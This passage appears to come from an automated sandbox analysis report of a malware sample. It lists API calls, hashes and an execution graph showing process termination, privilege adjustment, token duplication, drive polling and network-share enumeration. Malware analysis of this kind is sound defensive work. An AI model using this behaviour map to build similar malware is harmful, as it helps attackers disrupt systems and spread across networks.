      • API ID: Heap$Process$AllocAllocateConsoleCountCreateCriticalFileFreeHandleInitializeSectionSpin
      • String ID:
      • API String ID: 2520791297-0
      • Opcode ID: a8e23bba24cebdf5f60924442f6e079ccc81bc785cae67dfa1648ae9d114e758
      • Instruction ID: 56d7cacb38cfa7368e118adc7610bde5d83e2380fd25f428c4dad75abbc2b513
      • Opcode Fuzzy Hash: a8e23bba24cebdf5f60924442f6e079ccc81bc785cae67dfa1648ae9d114e758
      • Instruction Fuzzy Hash: F12135B260034337E2212A669C96B7B365CDF677BDF000226F935950C2DB388F8186E5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 00CA86EA
      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00CA8713
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8737
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CA8766
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite
      • String ID:
      • API String ID: 539440098-0
      • Opcode ID: 577139a35272c79bbd5225d4fb09a94ea38ad3c7a8befadbb8d099311a00dd40
      • Instruction ID: 4c65a1710210c7efd76c905d9c1ad759b04c35bb57d054d2bb2abc9b98e248e2
      • Opcode Fuzzy Hash: 577139a35272c79bbd5225d4fb09a94ea38ad3c7a8befadbb8d099311a00dd40
      • Instruction Fuzzy Hash: E721287590020AAFDF11DFA5CC80EAFBBB9FB49784F104529F411E2150EB719A06CF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,00CA56C4), ref: 00CA331E
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3371
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA337B
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 00CA3386
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEvent$Heap$AllocateCountCriticalInitializeProcessSectionSpin
      • String ID:
      • API String ID: 2451660498-0
      • Opcode ID: c42903696a9700ceed2d089fbdebf252c5474c15a51b6a96012ad47e33b658b8
      • Instruction ID: 5314fa032f878ba78f4907b324b57682f2c9bd9124cc286a52f2afc0fe928809
      • Opcode Fuzzy Hash: c42903696a9700ceed2d089fbdebf252c5474c15a51b6a96012ad47e33b658b8
      • Instruction Fuzzy Hash: 0A21DEB16013469FDB30AFA689D5B17F6E8FF49B48F01442EF28997590CBB0DA818B50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountTick$select
      • String ID:
      • API String ID: 2350311442-0
      • Opcode ID: b6bf4797658bb2e65eac2ba0743510369c53928a3ba76650a797d3a2a7a97330
      • Instruction ID: 5cec22478d4973f495d42e55e91f0358f561be690f62f176dabccaabfc5aa7ce
      • Opcode Fuzzy Hash: b6bf4797658bb2e65eac2ba0743510369c53928a3ba76650a797d3a2a7a97330
      • Instruction Fuzzy Hash: 25113D72D0021DABDB14DBA4CC85BDEB7BCAF09304F1040A6E704E7180DA709A458F91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateThread.KERNEL32(00000000,00000000,00CA4B85,00000000,00000000,00000000), ref: 00CA4D8A
      • WaitForSingleObject.KERNEL32(00000000,00000000,?,00CA4DDD,00000000,00000000,?,00000000,?,00CA2C9F,0000002C), ref: 00CA4D98
      • GetExitCodeThread.KERNEL32(00000000,?,?,00CA4DDD,00000000,00000000,?,00000000,?,00CA2C9F,0000002C), ref: 00CA4DA7
      • CloseHandle.KERNEL32(00000000,?,00CA4DDD,00000000,00000000,?,00000000,?,00CA2C9F,0000002C), ref: 00CA4DB1
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Thread$CloseCodeCreateExitHandleObjectSingleWait
      • String ID:
      • API String ID: 478055939-0
      • Opcode ID: 9cefd910dab2b4de285f9e504e02158a3e9e76eab30a54041ba74f68972e5d4b
      • Instruction ID: 0f64a7c990f70d12bc9bbe65de9ffff5f4e8a76ce4f28ff9df95f07f34cdedd5
      • Opcode Fuzzy Hash: 9cefd910dab2b4de285f9e504e02158a3e9e76eab30a54041ba74f68972e5d4b
      • Instruction Fuzzy Hash: 37F0FE71502125BB8B259B65ED4DEFF7EBCEE87B697100015F805D3110D7748A01D6B2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LeaveCriticalSection.KERNEL32(?), ref: 00CA34B9
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CA34C3
      • EnterCriticalSection.KERNEL32(?), ref: 00CA34CA
        • Part of subcall function 00CA33F3: SetEvent.KERNEL32(00000004), ref: 00CA3459
        • Part of subcall function 00CA33F3: ResetEvent.KERNEL32(00000000), ref: 00CA3462
      • LeaveCriticalSection.KERNEL32(?), ref: 00CA34DD
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeave$EnterObjectResetSingleWait
      • String ID:
      • API String ID: 3328302011-0
      • Opcode ID: 52577faffdf96924a7c26ccc67ff75190ef968995c950771129ea07b87de9262
      • Instruction ID: ffd2556799d3933af69241236506cf9aebeb9be2f54571655c6c5ad42d0f836c
      • Opcode Fuzzy Hash: 52577faffdf96924a7c26ccc67ff75190ef968995c950771129ea07b87de9262
      • Instruction Fuzzy Hash: FBF08272504246BBCB015B69ED44A9F7F6CEB0A3787104111F51693161DB71DE44C7A1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(00CA1FEB,00CA1FDB,00000000,00000000,00CA5906,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA53EE
      • SetEvent.KERNEL32(A0A815FF,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5404
      • SetEvent.KERNEL32(8B00CAA0,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA5416
      • LeaveCriticalSection.KERNEL32(00CA1FEB,?,00CA1FDB,00000000,0000010C,?,?,000000FF), ref: 00CA541F
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalEventSection$EnterLeave
      • String ID:
      • API String ID: 2034477713-0
      • Opcode ID: b02ed5ac6350e599e52556e2e341f4a0f5e61dd19129847dccb3eb3162d4143f
      • Instruction ID: d897b6d64f215fb38f01c387a65cf39aae7bd8b306569b9eef2b86fe9fd25423
      • Opcode Fuzzy Hash: b02ed5ac6350e599e52556e2e341f4a0f5e61dd19129847dccb3eb3162d4143f
      • Instruction Fuzzy Hash: 9FF03772100A119BC7209F69DC40D56B7E9FF5A36A3218A25E9A3D3165C731EC81DB61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 00CA20F9
      • WNetUseConnectionW.MPR(00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA2126
        • Part of subcall function 00CA1E10: WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00CA1E66
        • Part of subcall function 00CA1E10: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00CA1E83
        • Part of subcall function 00CA1E10: WNetEnumResourceW.MPR(?,?,?,?), ref: 00CA2046
        • Part of subcall function 00CA1E10: WNetCloseEnum.MPR(?), ref: 00CA205E
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$Resource$AddressCloseConnectionOpenString
      • String ID: \\e-
      • API String ID: 2373711962-2557246277
      • Opcode ID: 6487f508029036a16d2fdc6f5772ac4046fd2f4863183c6f747c9ea7d860c77b
      • Instruction ID: 413cb8dd199b6aec0281899bbe410ac00d5e76185d52c3971e32e5c825e213cd
      • Opcode Fuzzy Hash: 6487f508029036a16d2fdc6f5772ac4046fd2f4863183c6f747c9ea7d860c77b
      • Instruction Fuzzy Hash: 27211072508305AFD700DFA9CC85AABB7EDFF49714F00492EF694D6150E771DA188B92
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:5.3%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:0%
      Total number of Nodes:1291
      Total number of Limit Nodes:7
      execution_graph 4673 d22ee 4674 d6347 2 API calls 4673->4674 4675 d2300 4674->4675 4676 d6347 2 API calls 4675->4676 4677 d230b 4676->4677 4678 d3955 9 API calls 4677->4678 4679 d231e 4678->4679 4680 d2332 4679->4680 4698 d3dc0 GetCurrentProcess OpenProcessToken 4679->4698 4681 d237b 4680->4681 4684 d35d2 4 API calls 4680->4684 4683 d3955 9 API calls 4681->4683 4687 d2387 4683->4687 4692 d2344 4684->4692 4686 d39da 2 API calls 4686->4680 4716 d90a1 GetProcessHeap HeapFree 4687->4716 4689 d39da 2 API calls 4689->4681 4690 d2390 4693 d236d 4692->4693 4697 d2372 4692->4697 4704 d4dee CreateToolhelp32Snapshot 4692->4704 4714 d5962 EnterCriticalSection LeaveCriticalSection 4692->4714 4715 d90a1 GetProcessHeap HeapFree 4693->4715 4697->4689 4699 d3e25 4698->4699 4700 d3de6 LookupPrivilegeValueW 4698->4700 4702 d3e2a CloseHandle 4699->4702 4703 d232b 4699->4703 4700->4699 4701 d3df8 AdjustTokenPrivileges 4700->4701 4701->4699 4702->4703 4703->4686 4705 d2351 Sleep 4704->4705 4706 d4e11 4704->4706 4705->4692 4707 d4e25 Process32FirstW 4706->4707 4708 d4e99 CloseHandle 4707->4708 4709 d4e48 4707->4709 4708->4705 4710 d4e5d OpenProcess 4709->4710 4711 d4e84 Process32NextW 4709->4711 4710->4709 4712 d4e74 TerminateProcess CloseHandle 4710->4712 4711->4709 4713 d4e98 4711->4713 4712->4709 4713->4708 4714->4692 4715->4697 4716->4690 4717 d34eb 4718 d3577 4717->4718 4719 d3509 4717->4719 4719->4718 4720 d3539 ResetEvent SetEvent 4719->4720 4721 d354b 4719->4721 4720->4721 4722 d3566 4721->4722 4725 d31c3 4721->4725 4722->4718 4723 d356d SetEvent 4722->4723 4723->4718 4726 d31ce 4725->4726 4727 d31d9 4725->4727 4731 d30af 4726->4731 4738 d313f 4727->4738 4730 d31d6 4730->4722 4732 d30bc 4731->4732 4737 d30ca 4731->4737 4733 d30cd 4732->4733 4734 d30c4 4732->4734 4736 d9041 2 API calls 4733->4736 4735 d907a 2 API calls 4734->4735 4735->4737 4736->4737 4737->4730 4739 d31a0 4738->4739 4740 d3146 4738->4740 4739->4730 4740->4739 4741 d907a 2 API calls 4740->4741 4741->4739 
4742 d1cc5 GetLogicalDrives 4743 d3c7a 10 API calls 4742->4743 4744 d1ce0 4743->4744 4745 d6347 2 API calls 4744->4745 4746 d1cee 4745->4746 4766 d530c 4746->4766 4749 d3955 9 API calls 4764 d1d17 4749->4764 4750 d1dd9 4751 d1de6 4750->4751 4779 d52de 4750->4779 4752 d39da 2 API calls 4751->4752 4754 d1def 4752->4754 4756 d3955 9 API calls 4754->4756 4757 d1dfb 4756->4757 4786 d90a1 GetProcessHeap HeapFree 4757->4786 4758 d1d33 GetLogicalDrives 4760 d1dbe Sleep 4758->4760 4758->4764 4760->4764 4761 d1e04 4762 d1706 22 API calls 4762->4764 4764->4750 4764->4751 4764->4758 4764->4760 4764->4762 4765 d5840 49 API calls 4764->4765 4776 d542b WaitForSingleObject 4764->4776 4778 d5962 EnterCriticalSection LeaveCriticalSection 4764->4778 4765->4764 4767 d9041 2 API calls 4766->4767 4768 d5315 4767->4768 4769 d531e InitializeCriticalSectionAndSpinCount 4768->4769 4775 d1d05 4768->4775 4770 d5368 4769->4770 4771 d5331 CreateEventW CreateEventW 4769->4771 4787 d90a1 GetProcessHeap HeapFree 4770->4787 4772 d535c 4771->4772 4774 d52de 5 API calls 4772->4774 4772->4775 4774->4775 4775->4749 4777 d543d 4776->4777 4777->4764 4778->4764 4780 d52ec CloseHandle 4779->4780 4781 d52ef 4779->4781 4780->4781 4782 d52f9 DeleteCriticalSection 4781->4782 4783 d52f6 CloseHandle 4781->4783 4788 d90a1 GetProcessHeap HeapFree 4782->4788 4783->4782 4785 d5309 4785->4751 4786->4761 4787->4775 4788->4785 4789 d5444 4794 d5962 EnterCriticalSection LeaveCriticalSection 4789->4794 4791 d5458 4792 d5474 4791->4792 4795 d349e 4791->4795 4794->4791 4796 d34c9 EnterCriticalSection 4795->4796 4801 d33f3 4796->4801 4799 d34dc LeaveCriticalSection 4799->4792 4800 d34b8 LeaveCriticalSection WaitForSingleObject 4800->4796 4802 d3411 4801->4802 4803 d3423 4802->4803 4804 d3490 ResetEvent 4802->4804 4805 d31c3 4 API calls 4802->4805 4807 d3468 4802->4807 4803->4807 4808 d3450 SetEvent ResetEvent 4803->4808 4804->4807 4806 d348c 4805->4806 4806->4803 4806->4804 4807->4799 4807->4800 4808->4807 3653 d2fa7 3656 
d29f5 3653->3656 3657 d2f9e ExitProcess 3656->3657 3658 d2a47 3656->3658 3658->3657 3795 d62a6 3658->3795 3660 d2a6f 3660->3657 3804 d6347 3660->3804 3662 d2a8c GetTickCount 3663 d2aa0 3662->3663 3664 d2abe 3663->3664 3665 d2aa6 GetLocaleInfoW 3663->3665 3668 d2ef0 3664->3668 3808 d2876 3664->3808 3665->3664 3667 d2add 3669 d6347 2 API calls 3667->3669 3670 d2efd 3668->3670 4194 d597e EnterCriticalSection DeleteCriticalSection 3668->4194 3671 d2ae5 3669->3671 3674 d2f0e 3670->3674 3677 d597e 4 API calls 3670->3677 3673 d2b01 3671->3673 3820 d271b 3671->3820 3849 d39da 3673->3849 3678 d2f44 3674->3678 3679 d2f12 EnterCriticalSection 3674->3679 3677->3674 3684 d2876 2 API calls 3678->3684 3682 d2f28 3679->3682 3683 d2f21 CloseHandle 3679->3683 3688 d2f37 DeleteCriticalSection 3682->3688 3689 d2f30 CloseHandle 3682->3689 3683->3682 3686 d2f4e 3684->3686 4198 d39b7 3686->4198 4197 d90a1 GetProcessHeap HeapFree 3688->4197 3689->3688 3690 d2876 2 API calls 3690->3673 3695 d2f6a 3698 d2f79 3695->3698 3700 d1870 2 API calls 3695->3700 3701 d2f7f ReleaseMutex CloseHandle 3698->3701 3702 d2f93 3698->3702 3700->3698 3701->3702 4210 d6274 3702->4210 3707 d5930 5 API calls 3708 d2b54 3707->3708 3708->3668 3709 d2b6e 3708->3709 3710 d2be6 3708->3710 3712 d4ea5 14 API calls 3709->3712 3900 d4ea5 3710->3900 3713 d2b75 3712->3713 3713->3668 3717 d4f7a 16 API calls 3713->3717 3715 d2bf1 3918 d4f7a 3715->3918 3716 d2c62 3719 d2c98 3716->3719 3723 d4f7a 16 API calls 3716->3723 3720 d2b84 3717->3720 3721 d4dbe 28 API calls 3719->3721 3724 d2ba3 3720->3724 3727 d2b8f 3720->3727 3725 d2c9f 3721->3725 3726 d2c6f 3723->3726 3728 d2bbf 3724->3728 3956 d4dbe 3724->3956 3729 d2ccc 3725->3729 3736 d2cac 3725->3736 3731 d2be0 3726->3731 3732 d2c74 3726->3732 3923 d49d3 3727->3923 3728->3731 3748 d4dbe 28 API calls 3728->3748 3733 d3c7a 10 API calls 3729->3733 3730 d2c1d 3730->3668 3741 d2c15 3730->3741 3731->3719 3734 d2c8e 3731->3734 3993 d489e 3732->3993 3740 d2cdc 3733->3740 4007 d2946 
3734->4007 4098 d3c7a 3736->4098 3737 d2c10 3963 d242f CreateEventW 3737->3963 3749 d1894 10 API calls 3740->3749 3741->3668 3741->3730 3974 d4944 GetVersion 3741->3974 3747 d2c7d Sleep 3747->3731 3748->3731 3754 d2ce3 3749->3754 3752 d2b98 Sleep 3752->3724 3758 d3c7a 10 API calls 3754->3758 3755 d2c38 3755->3668 3761 d4f7a 16 API calls 3755->3761 3764 d2c51 Sleep 3755->3764 3760 d2cf8 3758->3760 3759 d2cc4 3759->3668 3763 d2d0f 3759->3763 3762 d1894 10 API calls 3760->3762 3761->3755 3762->3759 4144 d24c2 3763->4144 3764->3755 3766 d2c5d 3764->3766 3766->3668 3767 d2d24 3768 d2e17 3767->3768 3769 d2d47 CreateThread 3767->3769 3770 d24c2 3 API calls 3768->3770 3771 d2ed5 3769->3771 3772 d2d6a 3769->3772 4658 d239a 3769->4658 3773 d2e02 3770->3773 3771->3668 3777 d2ee6 CloseHandle 3771->3777 3774 d2d90 3772->3774 3775 d24c2 3 API calls 3772->3775 3778 d2e3f WaitForSingleObject 3773->3778 3779 d2e4b 3773->3779 3776 d24c2 3 API calls 3774->3776 3775->3774 3780 d2dbb 3776->3780 3777->3771 3778->3779 4149 d5962 EnterCriticalSection LeaveCriticalSection 3779->4149 3783 d24c2 3 API calls 3780->3783 3782 d2e54 3784 d2e96 3782->3784 3790 d2e69 3782->3790 4150 d1000 3782->4150 3785 d2de6 3783->3785 3786 d2e9d EnterCriticalSection LeaveCriticalSection 3784->3786 3787 d2ebe 3784->3787 3788 d24c2 3 API calls 3785->3788 3786->3787 3787->3771 3789 d2ec2 WaitForMultipleObjects 3787->3789 3788->3773 3789->3771 3792 d2946 18 API calls 3790->3792 3793 d2e74 3790->3793 3792->3793 3793->3784 3794 d4dbe 28 API calls 3793->3794 3794->3784 4218 d9041 3795->4218 3797 d62b1 3798 d9041 2 API calls 3797->3798 3802 d62f9 3797->3802 3799 d62c5 3798->3799 3800 d9041 2 API calls 3799->3800 3801 d62d3 3800->3801 3801->3802 3803 d6274 2 API calls 3801->3803 3802->3660 3803->3802 3805 d636b 3804->3805 3807 d6383 3804->3807 3806 d9041 2 API calls 3805->3806 3805->3807 3806->3807 3807->3662 3809 d287d 3808->3809 3810 d2883 3808->3810 4221 d90a1 GetProcessHeap HeapFree 3809->4221 3815 d2891 3810->3815 
4222 d90a1 GetProcessHeap HeapFree 3810->4222 3813 d28ad 3818 d28bb 3813->3818 4225 d90a1 GetProcessHeap HeapFree 3813->4225 3814 d289f 3814->3813 4224 d90a1 GetProcessHeap HeapFree 3814->4224 3815->3814 4223 d90a1 GetProcessHeap HeapFree 3815->4223 3818->3667 3821 d9041 2 API calls 3820->3821 3822 d273d 3821->3822 3823 d9041 2 API calls 3822->3823 3824 d2748 3823->3824 3825 d2836 3824->3825 3828 d2843 3824->3828 4226 d5b20 3824->4226 3825->3828 4247 d90a1 GetProcessHeap HeapFree 3825->4247 3829 d2851 3828->3829 4248 d90a1 GetProcessHeap HeapFree 3828->4248 3832 d285f 3829->3832 4249 d90a1 GetProcessHeap HeapFree 3829->4249 3830 d2765 3830->3825 3836 d278f CreateFileW 3830->3836 3834 d2870 3832->3834 4250 d90a1 GetProcessHeap HeapFree 3832->4250 3834->3673 3834->3690 3836->3825 3837 d27ad SetFilePointer 3836->3837 3838 d9041 2 API calls 3837->3838 3839 d27c2 3838->3839 3840 d9041 2 API calls 3839->3840 3841 d27cf 3840->3841 3842 d282d CloseHandle 3841->3842 3843 d27dd SetFilePointer 3841->3843 3842->3825 3843->3842 3844 d27e9 ReadFile 3843->3844 3844->3842 3845 d27ff 3844->3845 3845->3842 3846 d2804 MultiByteToWideChar 3845->3846 4235 d2504 3846->4235 3850 d39e3 3849->3850 3852 d2b07 3849->3852 3851 d39b7 2 API calls 3850->3851 3851->3852 3853 d3e39 GetVersion 3852->3853 3854 d2b0d 3853->3854 3855 d3e52 GetCurrentProcess OpenProcessToken 3853->3855 3859 d3772 3854->3859 3856 d3e69 GetTokenInformation 3855->3856 3857 d3e87 3855->3857 3856->3857 3857->3854 3858 d3e90 FindCloseChangeNotification 3857->3858 3858->3854 3860 d9041 2 API calls 3859->3860 3861 d377f 3860->3861 3862 d9041 2 API calls 3861->3862 3863 d378c 3862->3863 3864 d9041 2 API calls 3863->3864 3865 d3794 3864->3865 3866 d37a1 InitializeCriticalSectionAndSpinCount 3865->3866 3875 d3827 3865->3875 3867 d37b1 3866->3867 3872 d37b7 3866->3872 4282 d90a1 GetProcessHeap HeapFree 3867->4282 3870 d37c0 AllocConsole GetStdHandle 3876 d37d3 3870->3876 3871 d2b27 3871->3668 3880 d28ca 3871->3880 3872->3870 
3872->3876 3873 d3835 3873->3871 4284 d90a1 GetProcessHeap HeapFree 3873->4284 3875->3873 4283 d90a1 GetProcessHeap HeapFree 3875->4283 3876->3875 3877 d5b20 5 API calls 3876->3877 3878 d37eb 3877->3878 3878->3875 3879 d380d CreateFileW 3878->3879 3879->3875 3881 d3c7a 10 API calls 3880->3881 3882 d28d8 3881->3882 3883 d6347 2 API calls 3882->3883 3884 d28e4 3883->3884 3892 d292e 3884->3892 4285 d5fe7 3884->4285 3886 d39da 2 API calls 3888 d2939 3886->3888 3889 d39da 2 API calls 3888->3889 3891 d2940 3889->3891 3893 d5930 3891->3893 3892->3886 3894 d9041 2 API calls 3893->3894 3895 d5938 3894->3895 3896 d593f InitializeCriticalSectionAndSpinCount 3895->3896 3897 d2b43 3895->3897 3896->3897 3898 d5955 3896->3898 3897->3670 3897->3707 4324 d90a1 GetProcessHeap HeapFree 3898->4324 3901 d3c7a 10 API calls 3900->3901 3902 d4eb4 3901->3902 3903 d6347 2 API calls 3902->3903 3904 d4ebe 3903->3904 3905 d5fe7 6 API calls 3904->3905 3906 d4f0b 3905->3906 3907 d4f4b 3906->3907 3908 d4f17 OpenMutexW 3906->3908 3912 d4f62 3907->3912 3913 d4f55 CloseHandle 3907->3913 3909 d4f39 WaitForSingleObject 3908->3909 3910 d4f2a CreateMutexW 3908->3910 3909->3907 3909->3912 3910->3909 3911 d4f60 3910->3911 3911->3912 3914 d39da 2 API calls 3912->3914 3913->3912 3915 d4f6a 3914->3915 3916 d39da 2 API calls 3915->3916 3917 d2bec 3916->3917 3917->3715 3917->3716 3919 d4ea5 14 API calls 3918->3919 3920 d4f8b 3919->3920 3921 d2bf8 3920->3921 3922 d4f92 ReleaseMutex CloseHandle 3920->3922 3921->3668 3921->3730 3921->3737 3922->3921 3924 d6347 2 API calls 3923->3924 3925 d49ef 3924->3925 3926 d9041 2 API calls 3925->3926 3927 d4a0b GetVersion 3926->3927 3928 d4a39 3927->3928 3929 d4b3a 3928->3929 4325 d3d4b 3928->4325 3931 d4b3f CloseHandle 3929->3931 3932 d4b44 3929->3932 3931->3932 3933 d4b4e 3932->3933 3934 d4b49 CloseHandle 3932->3934 3936 d4b58 3933->3936 3937 d4b53 CloseHandle 3933->3937 3934->3933 3939 d4b5d CloseHandle 3936->3939 3940 d4b62 3936->3940 3937->3936 3938 d4a89 3955 d4b08 
3938->3955 4334 d5b0e GetModuleFileNameW 3938->4334 3939->3940 3942 d4b6f 3940->3942 4335 d90a1 GetProcessHeap HeapFree 3940->4335 3941 d3d4b 6 API calls 3943 d4b2e 3941->3943 3947 d39b7 2 API calls 3942->3947 3943->3929 3948 d4b35 CloseHandle 3943->3948 3945 d4a9a 3949 d4aa3 GetShellWindow 3945->3949 3945->3955 3950 d2b94 3947->3950 3948->3929 3951 d4aad GetWindowThreadProcessId 3949->3951 3949->3955 3950->3724 3950->3752 3952 d4abc OpenProcess 3951->3952 3951->3955 3953 d4ad2 OpenProcessToken 3952->3953 3952->3955 3954 d4ae7 DuplicateTokenEx 3953->3954 3953->3955 3954->3955 3955->3941 3957 d6347 2 API calls 3956->3957 3958 d4dcf 3957->3958 3959 d4de6 3958->3959 4336 d4d68 3958->4336 3959->3728 3964 d24ba 3963->3964 3965 d2450 CreateThread 3963->3965 3964->3741 3966 d2463 3965->3966 4409 d454b 3965->4409 3967 d4f7a 16 API calls 3966->3967 3968 d247c SetEvent WaitForSingleObject 3966->3968 3969 d2470 Sleep 3966->3969 3967->3966 3971 d249f GetExitCodeThread 3968->3971 3972 d24aa CloseHandle 3968->3972 3969->3966 3969->3968 3971->3972 3972->3964 3973 d24b7 CloseHandle 3972->3973 3973->3964 3975 d6347 2 API calls 3974->3975 3976 d4962 3975->3976 3977 d9041 2 API calls 3976->3977 3978 d496e 3977->3978 3980 d4428 13 API calls 3978->3980 3990 d49b7 3978->3990 3979 d49c3 3983 d39da 2 API calls 3979->3983 3982 d497d 3980->3982 3985 d3d4b 6 API calls 3982->3985 3982->3990 3984 d49ca 3983->3984 3984->3755 3986 d498c 3985->3986 3987 d49a8 3986->3987 4541 d5b0e GetModuleFileNameW 3986->4541 3988 d3d4b 6 API calls 3987->3988 3988->3990 3990->3979 4542 d90a1 GetProcessHeap HeapFree 3990->4542 3991 d499c 3991->3987 3992 d3e9e ShellExecuteExW 3991->3992 3992->3987 3994 d9041 2 API calls 3993->3994 3995 